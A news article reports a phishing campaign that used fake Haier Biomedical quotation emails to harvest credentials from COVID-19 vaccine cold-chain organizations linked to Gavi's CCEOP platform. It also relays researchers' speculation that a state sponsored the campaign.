Although many public and business entities across the globe may already be on the verge of creating an effective COVID-19 vaccine, they also need to figure out how to deal with the logistic challenge of keeping doses at freezing conditions throughout the supply chain distribution. On top of everything else, COVID-19 cold chain developers have become subject to a new cyberattack designed to harvest login credentials for potential future benefits. The attack — a phishing email campaign currently unfolding in Western Europe, South Korea, and Taiwan — aims to strike organizations presently focused on inventing the technology that would allow COVID-19 vaccines to retain their potency throughout the entire supply chain cycle. Although security analysts have yet to reveal the real culprit, they speculate that it may be a state-backed undertaking.
This Week In Malware Episode 37 Part 2: State-Sponsored Hackers (APT28 Fancy Bear) Target COVID-19 Vaccine Makers
A CCEOP-Related Affair
Disguised as simple quotation requests, the phishing emails also arrived with HTML-coded tools, which prompted recipients to submit their login credentials. The messages looked as though they were coming from Haier Biomedical, a renowned cold chain service provider. In reality, they seek to harvest login credentials and potentially use those to acquire administrator access to COVID-19 vaccine distribution and other sensitive data in due course.
The phishing campaign's focal point is companies and organizations that utilize the Cold Chain Equipment Optimization Platform (CCEOP). Developed by the Gavi Vaccine Alliance, CCEOP seeks to help businesses create the technology required to transport vaccines at ultracold temperatures. At present, cold chain transportation is a topic of vested interest for a large number of companies across the entire economic spectrum. What is more, the list of entities associated with CCEOP is long enough to include high-profile international players such as the EU's Directorate-General for Taxation and Customs Union.
Not a Hacker But a State?
It's not yet evident who embarked on this campaign. Considering its large scale, meticulous execution, and lack of apparent monetary benefit, researchers believe that the attack may be a mere espionage campaign sanctioned at a government level. Now that dozens of countries are racing against time to come up with a robust and fully-working remedy for COVID-19, some players may find it hard to resist the lure of peeping into how far the competition may have gone. Bearing in mind that incessant cyberattacks have marred the entire COVID-19-related R&D right at the outset, such an assumption may not necessarily be far from the truth.